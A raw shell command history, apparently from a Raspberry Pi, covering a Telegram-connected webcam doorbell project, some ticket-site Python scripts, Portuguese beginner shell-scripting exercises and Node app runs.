+vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +ls +ls +bin/telegram-cli --hkur +vi you.sh +sh you.sh +/bin/sh you.sh +crontab -e +sh you.sh +vi you.sh +sh you.sh +vi you.sh +crontab -e +vi you.sh +crontab -e +/bin/sh /home/pi/you.sh +crontab -e +ls -a +sudo lua signal1.lua +htop +killall telegram-cli +sudo killall telegram-cli +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +sudo lua signal1.lua +ls +ls -a +ls +vi config +ls -a +vi auth +ls +ls +ll +ls -a +ls +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +mv .telegram-cli .telegram-cli2 +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +git pull origin master +./configure +./configure --disable-python +./configure --disable-python --disable-json +make +ls +make +ls +mv tg tg5 +./configure --disable-python --disable-json +ls +./configure --disable-python --disable-json +make +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +make +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +crontab -e +reboot +sudo reboot +crontab -e +vi pz.lua +crontab -e +date +raspi-config +sudo raspi-config +date +crontab -e +exit +ll +ls +crontab -e +at +sudo apt-get install at +at 21:57 Thu +mail +sudo at 7:00 AM Fri +atq +sudo atq +apt-get install lighttpd +sudo apt-get install lighttpd +sudo vi /var/www/index.lighttpd.html +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi signal1.lua +sudo python +nano deurbel.py +sudo pyton deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +ls +/home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -W -e 'msg Partyzone! /deurbel!' +vi /etc/rc.local +/home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -W -e 'msg Partyzone! /deurbel!' +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -W -e 'msg Partyzone! /deurbel!' +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +sudo python deurbel.py +vi scanner.py +nano deurbel.py +sudo python deurbel.py +nano deurbel.py +cp signal1.lua deurbelgeluid_1.1.lua +sudo python deurbel.py +nano deurbel.py +nano deurbelgeluid_1,1.lua +nano deurbelgeluid_1.1.lua +sudo lua deurbelgeluid_1.1.lua +nano deurbelgeluid_1.1.lua +sudo lua deurbelgeluid_1.1.lua +nano deurbelgeluid_1.1.lua +sudo lua deurbelgeluid_1.1.lua +nano deurbelgeluid_1.1.lua +sudo lua deurbelgeluid_1.1.lua +sudo nano /etc/rc.local +reboot +sudo reboot +htop +nano /etc/rc.local +sudo /usr/bin/python /home/pi/deurbel.py +nano /etc/rc.local +sudo nano /etc/rc.local +reboot +sudo reboot +htop +reboot --help +nano deurbel.py +reboot +sudo reboot +nano deurbel.py +sudo reboot +htop +sudo killall python +htop +sudo python deurbel.py +nano rc.local +sudo nano rc.local +sudo nano /etc/rc.local +/var/log/syslog +sudo /var/log/syslog +sudo /var/log/sys.log +sudo /var/log/cys.log +sudo nano /var/log/sys.log +nano deurbel.py +nano /etc/rc.local +htop +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +sudo /home/pi/tg/bin/telegram-cli /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli /home/pi/tg/tg-server.pub --python-script /home/pi/tg/tg-test.py +git log +ll +./configure +sudo apt-get install libpython-dev +sudo apt-get install python-dev +./configure +sudo apt-get install libjansson +sudo apt-get install libjansson-dev +./configure +make +killall python +sudo killall python +vi deurbel.py +crontab -e +sudo apt-get install vim +vi deurbel.py +python deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +sudo python deurbel.py +vi deurbel.py +vi deurbel2.py +vi deurbel.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo killall telegram-cli +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/README-PY.md +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py | grep python +ll +ls +vi deurbel2.py +git clone +sudo python setup.py install +pip +sudo apt-get install python-setuptools +sudo python setup.py install +sudo python setup.py install +sudo apt-get install python-pip +sudo python setup.py install +ll +ll +ls +vi deurbel2.py +python deurbel2.py +vi deurbel2.py +python deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +ll +ls +python ping.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +ll +ls +python dialog_list.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +wgets/c/c9/Moon.jpg +mv Moon.jpg image.jpg +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +python +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +python +sudo apt-get install fswebcam +fswebcam image.jpg +vi deurbel.py +killall python +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py & +vi deurbel2.py +python +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +killall python +sudo killall python +sudo python -i deurbel2.py +sudo killall python +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python -i deurbel2.py +vi deurbel2.py +sudo python deurbel2.py & +sudo vi /etc/rc.local +vi deurbel2.py +sudo reboot +ll +ls +sudo killall telegram-cli +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -Z /home/pi/tg/tg-test.py +vi tg/tg-test.py +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub --json -P 4458 +htop +ll +ls -a +stat image.jpg +vi deurbel2.py +sudo reboot +htop +vi /etc/rc.local +vi deurbel.py +vi deurbel2.py +killall python +sudo killall python +sudo python -i deurbel2.py +sudo reboot +htop +vi deurbel2.py +python dialog_list.py +vi deurbel2.py +python dialog_list.py +python dialog_list.py | grep chat +vi deurbel2.py +sudo reboot +pyton +python i +python +vi deurbel2.py +sudo killall python +sudo python deurbel2.py +vi deurbel2.py +sudo python deurbel2.py +vi deurbel2.py +sudo reboot +stat image.jpg +vi deurbel +vi deurbel2.py +htop +vi /etc/rc.local +sudo vi /etc/rc.local +sudo reboot +htop +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458 & +htop +sudo killall telegram-cli +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458 +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4459 +sudo vi /etc/rc.local +sudo reboot +htop +vi /etc/rc.local +sudo apt-get install daemontools +svc +csh +vi /etc/init/svscan.conf +sudo vi /etc/init/svscan.conf +ll /etc/init +ls /etc/init +ls +sudo mkdir service +svscanboot +mkdir deurbel +sudo mkdir deurbel +echo -e '#!/bin/sh +exec ' +cat /etc/rc.local +sudo killall python +echo -e '#!/bin/sh +exec sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458' > /service/deurbel/run +sudo echo -e '#!/bin/sh +exec sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458' > /service/deurbel/run +sudo echo -e '#!/bin/sh +exec sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458' > sudo /service/deurbel/run +sudo vi deurbel/run +sudo chmod 755 /service/deurbel/run +exit +svscanboot +svstat /service/* +svstat /service/deurbel/ +ll +ls +ll +ls +svstat +svstat deurbel/ +ll +ls +sudo mv deurbel /etc/services/deurbel +sudo mv -r deurbel /etc/services/deurbel +sudo mv -R deurbel /etc/services/deurbel +ll +sudo mv -R deurbel/ /etc/services/deurbel +sudo mv deurbel/ /etc/services/deurbel +sudo mv deurbel/ /etc/services/ +sudo mv deurbel/ /etc/services +sudo mv deurbel /etc/services +ll +sudo rm -rf service +sudo mkdir /etc/service +ll +mkdir deurbel +sudo mkdir deurbel +vi deurbel/run +cat /etc/rc.local +:q! +vi deurbel/run +sudo vi deurbel/run +svscanboot +svc -d +./run +sudo chmod 755 run +./run +mv deurbel telegram +sudo mv deurbel telegram +./run +svscanboot +svstat +svstat/* +ll +ls +svstat * +svstat telegram/ +sudo apt-get install csh +svstat telegram/ +svc -d telegram/ +csh -cf '/command/svscanboot &' +ls +ls +svc -u /etc/service/telegram/ +svc -u /etc/service/telegram +csh -cf 'svscanboot &' +ls +svc -u /etc/service/telegram/ +ls +svscanboot +svscan +ll +ls +svscan +svc -u telegram/ +svscan +mkdir telegram/supervise +sudo svscan +svstat /etc/service/deurbel/ +svstat /etc/service/deurbel +htop +sudo svscanboot +svstat /etc/service/telegram +sudo svstat /etc/service/telegram +sudo mv /etc/service/telegram /etc/services/telegram +svscan /etc/service +sudo svscan /etc/service +tttdttsss +sudo vi /etc/rc.local +sudo reboot +svstat /etc/service/* +sudo svstat /etc/service/* +htop +sudo svstat /etc/service/* +sudo mkdir /etc/service/deurbel +sudo vi /etc/service/deurbel/run +cat /etc/rc.local +sudo vi /etc/service/deurbel/run +sudo reboot +svstat /etc/service/* +sudo svstat /etc/service/* +/etc/service/deurbel/run +sudo /etc/service/deurbel/run + /etc/service/deurbel/r +sudo chmod 755 /etc/service/deurbel/run +svstat /etc/service/* +sudo svstat /etc/service/* +ll +ls +sudo -i +sudo vi /etc/rc.local +sudo reboot +sudo svstat /etc/services/* +sudo svstat /etc/service/* +vi deurbel2.py +python dialog_list.py +vi deurbel2.py +sudo reboot +cat deurbel2.py +sudo svstat /etc/service/* +fswebcam image.jpg +fswebcam --help +fswebcam image.jpg -r 1600x1200 +fswebcam image.jpg -r 1280x720 +htop +fswebcam image.jpg +fswebcam image.jpg -r 640x480 +fswebcam image.jpg -r 1600x1200 +vi deurbel2.py +fswebcam image.jpg -r 800x600 --rotate 180 +fswebcam image.jpg -r 800x600 --rotate 270 +vi deurbel2.py +fswebcam image.jpg -r 800x600 --rotate 180 --save image.jpg +vi deurbel2.py +sudo reboot +htop +vi deurbel2.py +fswebcam /home/pi/image.jpg -r 800x600 --rotate 180 --save /home/pi/image.jpg +sleep 1 +sleep 5 swebcam /home/pi/image.jpg -r 800x600 --rotate 180 --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x600 --rotate 180 --save /home/pi/image.jpg +vi deurbel2.py +sudo reboot +ll +ls +vi deurbel2.py +vi deurbel.py +vi deurbel2.py +fswebcam /home/pi/image.jpg -r 800x600 --rotate 180 --save /home/pi/image.jpg +fswebcam -r 800x600 --rotate 180 --save /home/pi/image.jpg +vi deurbel2.py +sudo reboot +vi deurbel2.py +sudo reboot +fswebcam -r 800x600 --rotate 180 --save /home/pi/image.jpg +fscam --help +fswebcam --help +fswebcam -r 800x600 --rotate 180 --save /home/pi/image.jpg +fswebcam -r 800x400 --rotate 180 --save /home/pi/image.jpg +fswebcam -r 800x400 --rotate 180 --no-banner --save /home/pi/image.jpg +fswebcam -r 800x400 --rotate 180 --no-banner --title Partyzone --save /home/pi/image.jpg +fswebcam --help +fswebcam -r 800x400 --rotate 180 --title Partyzone --save /home/pi/image.jpg +fswebcam -r 800x400 --rotate 180 --title "PZ Cam1 " --save /home/pi/image.jpg +vi deurbel2.py +sudo reboot +ll +htop +svstat /service/* +svstat /etc/service/* +sudo svstat /etc/service/* +vi deurbel2.py +sudo svstat /etc/service/* +ll +ls +vi scanner.py +python scanner.py +sudo python scanner.py +vi deur +fswebcam +sudo reboot +fswebcam -r 800x400 --rotate 180 --title "PZ Cam1 " --save /home/pi/image.jpg +vi scanner.py +vi deurbel2.py +sudo python scanner.py +vi scanner.py +vi deurbel2.py +sudo python scanner.py +vi deurbel +vi deurbel2.py +vi scanner.py +ls +mkdir scanner +sudo mkdir scanner +ls +vi run +cg .. +vi run +sudo vi run +sudo chmod 755 run +vi /etc/rc.local +sudo /usr/bin/svscan /etc/service +sudo reboot +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +sudo svstat /etc/service/* +vi scanner.py +vi deurbel2.py +vi scanner.py +sudo reboot +ll +ls +svc -d /etc/service/deurbel +sudo svc -d /etc/service/deurbel +sudo svstat /etc/service/* +crontab -e +exit +vi deurbel2.py +fswebcam /home/pi/image.jpg -r 800x400 --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=50% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=50% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=20% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=100% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=0% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=60% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=100% --set contrast=30% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=70% --set contrast=30% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=80% --set contrast=20% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=80% --set contrast=30% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=75% --set contrast=30% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=70% --set contrast=40% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=70% --set contrast=0% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=70% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set "Restore Factory Settings" --set brightness=70% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=75% --set contrast=20% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=75% --set contrast=22% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=75% --set contrast=25% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +fswebcam --list-controls +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=70% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +fswebcam --list-controls +sudo reboot +fswebcam /home/pi/image.jpg -v -r 800x400 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +fswebcam /home/pi/image.jpg -v -r 800x400 --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +sudo reboot +fswebcam --list-controls +fswebcam /home/pi/image.jpg -r 1600x800 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 800x400 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 1600x800 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam /home/pi/image.jpg -r 1600x800 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.png +fswebcam -r 1600x800 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.png +fswebcam -r 1600x800 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 800x400 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1200x600 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1000x500 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1200x600 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1000x500 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 864x480 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1280x720 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +sudo reboot +fswebcam -r 1280x720 --set brightness=72% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1280x720 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +vi deurbel2.py +fswebcam -r 1280x720 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +htop +sudo svc /etc/service/ +sudo svc /etc/service/* +sudo svc /etc/services/* +sudo svc /etc/services/ +sudo python scanner.py +htop +vi /etc/service/telegram/run +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4458 +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4459 +ll +l +ls +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua --json -P 4459 +git pull +git pull --recursive +./configure +sudo lua ../signal1.lua +make +vi pz.lua +./configure +make +mv tg tg6 +git clone --recursivesheng/tg.git && cd tg +./configure +make +sudo reboot +fswebcam -r 1280x720 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +sudo reboot +fswebcam -r 1280x720 --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1280x720 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +fswebcam -r 1280x720 --set brightness=75% --set contrast=24% --title 'Partyzone Cam 1' --save /home/pi/image.jpg +svc -d /etc/service/scanner +sudo svc -d /etc/service/scanner +sudo svstat /etc/service/* +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +htop +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +python +nano +nano pz.lua +ls +nano scanner.py +python scanner.py +sudo reboot +python ticketswap.py +python ticketmaster.py +python +ls +python ticketswap.py +ls +nano ticketswap.py +pyton ticketswap +python ticketswap +python ticketswap.py +ls +python ticketswap.py +date +su +clear +nome="MATEUS STAHELIN" +echo nome +echo "meu nome : $nome" +echo $nome +unset nome +echo $nome +clear +some=$((5*5)) +echo $some +unset some +exit +mcedit +vi +ls +cat MateusStahelinVIM +nano MateusStahelinNANO +primeiro +primeiro +vi primeiro +ls +ls -la +mkdir bin +ls +ls MateusStahelinVIM +cat MateusStahelinVIM +VARIAVEL="estou sem ideias" +echo $VARIAVEL +echo $VARIAVEL $VARIAVEL +echo $VARIAVEL VARIAVEL +PATH +$PATH +ls +ls -la +ls -la +mv MateusStahelinVIM mateustalin/bin +mv mateustalin/MateusStahelinVIM mateustalin/bin +ls +mv MateusStahelinVIM bin +mv MateusStahelinNANO.save bin +ls +ls +HOJE=$(date) +echo "Hoje e: $HOJE" +HOJE=`date` +echo "Hoje e: $HOJE" +unset HOJE +echo $HOJE +ls +cat -n MateusStahelinVIM +pwd +find primeiro +find MateusStahelin +find -MateusStahelin +grep MateusStahelin +grep MateusStahelin bin +clear +exit +ls +ls +exit +vi primeiro +exit +ls +ls +primeiro +ls -la +chmod +x primeiro +ls -la +primeiro +exit +primeiro +ls -l +vi testando +rm testando +vi testando +rm testando +rm --help +man rm +rm man +ls +la +ls +vi testando +ls +vi testando +ls +rm testando +ls +n1=6 +n2=7 +test $n1 -lt $n2 || echo "MENOR" +test $n1 -lt $n2 && echo "MENOR" +dfsdf +echo "Informe usurio:" read user; +test "$user" - "Redes" && echo "User: $user" || echo "User: errado" +test "$user" = "Redes" && echo "User: $user" || echo "User: errado" +echo "Informe usurio:" read user; +echo "Informe usurio:"; read user; +test "$user" = "Redes" && echo "User: $user" || echo "User: errado" +vi arq1 +vi testaArquivos +vi idade +ls +ls +vi teste +/seila +ls +vi teste +ls +vi idade +ls +ls -l +chmod +x idade +ls -l +idade +clear +idade +ls +vi idade +ls -l +clear +idade +vi idade +ls -l +clear +idade +vi nomes +ls +chmod +x nomes +ls -l +nomes +vi nomes +nomes +vi nomes +nomes +ls +exit +ls +vi diretorio +chmod +x diretorio +diretorio +exitexit +exit +ls +ls +primeiro +vi primeiro +ls +vi idade +ls +ls +exit +exit +ls +ls +mkdir scripts +vi MateusStahelinNANO.save +mv diretorio scripts +mv nomes scripts +mv primeiro scripts +ls +ms idade scripts +mv idade scripts +ls +MateusStahelinVIM +vi MateusStahelinVIM +ls +ls -l +ls +diretorio +ls -l +idade +diretorio +./idade +vi idade +idade +/bin/bash +diretorio +primeiro +exit +ls +ls +ls +idade +mv diretorio bin +sls +ls +ls +diretorio +ls +ls +ls +c d/bin +ls +mv diretorio scripts +ls +ls +ls +exit +ls +ls +ls +bin +vi bin +mv bin diretorio +ls +chmod +x diretorio +diretorio +chmod + x idade +chmod +x idade +idade +end +exit +ls +ls +ls +nomes +./idade +./diretorio +./nomes +exit +./nomes +./diretorio +./nomes +exit +ls +ls +mkdir trabalho +ls +vi trab1 +exit +ls +ls +ls +exit +ls +ls +exit +ls +ls +ls +ls -l +ls -l +ls +./diretorio +ls +rm diretorio idade +ls +ls +rm nomes primeiro +ls +ls +./idade +./idade +vi idade +clear +ls +ls +mv diretorio idade nomes primeiro bin +mv diretorio idade nomes primeiro /bin +mv diretorio bin +mv idade bin +mv nomes bin; mv pimeiro bin +mv nomes bin; mv primeiro bin +mv nomes bin; mv primeiro bin; +ls +ls +ls +ls +vi bin +ls +cp bin primeiro +ls +vi primeiro +rm bin +ls +vi primeiro +ls +ls +ls +ls +exit +ls +ls +vi primeiro +ls -la +vi idade +vi relacao +vi idade +ls +ls +mv primeiro /home/mateustalin/bin +ls +rm -r scripts +ls +vi primeiro +vi relacao +ls +vi MateusStahelinVIM +exit +ls +backup +vi backup +mv backup bin +ls +ls +ls -l +clear +ls +mv trabalho ~/bin +mv trabalho /bin +mv trabalho /home/bin +ls +pwd +mv trabalho /home/mateustalin +ls +cp trabalho trabalho1 +ls +cp trabalho trabalho1 +mn cp +man cp +mkdir trabalho1 +ls +pwd +ls +mv trab1 /home/mateustalin/trabalho1 +ls +ls +ls +rm trabalho +rm -r trabalho +ls +vi trab1 +chmo +x trab1 +chmod +x trab1 +trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +pwd +vi trab1 +pwd +./trab1 +vi trab1 +./trab1 +vi trab1 +exit +ls +ls +vi trab1 +exit +ls +ls +vi trab1 +trab1 +./trab1 +trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +exit +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +exit +ls +ls +vi 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MateusStahelin.txt +ls +MateusStahelin.txt +chmod +x MateusStahelin.txt +MateusStahelin.txt +vi MateusStahelin.txt +MateusStahelin.txt +vi MateusStahelin.txt +vi MATEUS.txt +chmod +x MATEUS.txt +MATEUS.txt +vi MATEUS.txt +rm MATEUS.txt +ls +MateusStahelinNANO.save +vi MateusStahelinNANO.save +chmo +x MateusStahelinNANO.save +chmod +x MateusStahelinNANO.save +vi MateusStahelinNANO.save +MateusStahelinNANO.save +rm MateusStahelinNANO.save +ls +./MateusStahelin.txt +vi MateusStahelin.txt +./MateusStahelin.txt +vi MateusStahelin.txt +./MateusStahelin.txt +vi MateusStahelin.txt +./MateusStahelin.txt +vi MateusStahelin.txt +./MateusStahelin.txt +vi MateusStahelin.txt +./MateusStahelin.txt +vi MateusStahelin.txt +rm MateusStahelin.txt texto.txt +ls +vi texto.txt +chmod +x texto.txt +texto.txt +vi texto.txt +texto.txt +vi texto.txt +texto.txt +vi texto.txt +cat texto.txt +rev +exit +ls +ls +vi trab1 +ls +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +vi trab1 +./trab1 +exit +vim trab1 +exit +ls +vi trab1 +./trab1 +vi trab1 +ls +exit +ls +exit +vim trab1 +cp trab1 trab +ls +vi trab +ls +rm trab1 +ls +ls +mv trabalho1 trab1 +ls +ls +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +seq --help +man seq +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +s +ls +touch teste.txt +ls +vim teste.txt +vim trab +vim teste.txt +./trab +vim trab +vim teste.txt +./trab +vim teste.txt +vim trab +vim teste.txt +vim trab +mv teste.txt teste1 +ls +touch teste2 +ls +vim teste2 +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +clear +./trab +clear +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +exit +vim trab +exit +ls +exit +ls +ls +vim trab +exit +ls +ls +vim trab +exit +ls +ls +vi trab +./trab +vi trab +./trab +vi trab +./trab +vi trab +./trab +vi trab +./trab +vi trab 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teste1 +cat test2 +cat teste2 +cat teste3 +ls +cat texto.txt +ls trab1 +vim trab +.trab +./trab +vim trab +clear +./trab +exit +ll +ll +./trabV2 +ll +./trabV2 +vim trabV2 +top +ll +ll +ll +ls +ls +./trab +ls +vim trab +./trab1 +./trab +vim trab +./trab +vim trab +./trab +vim trab +./trab +vim trab +clear +./trab +vim trab +clear +./trab +vim trab +./trab +vim trab +clear +./trab +clear +./trab +ls +exit +ls +ls +vim trab +exit +node app +node register +logout +node app +node app +node register +node app +ls -a +ls +ls +ls -a +ls +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node 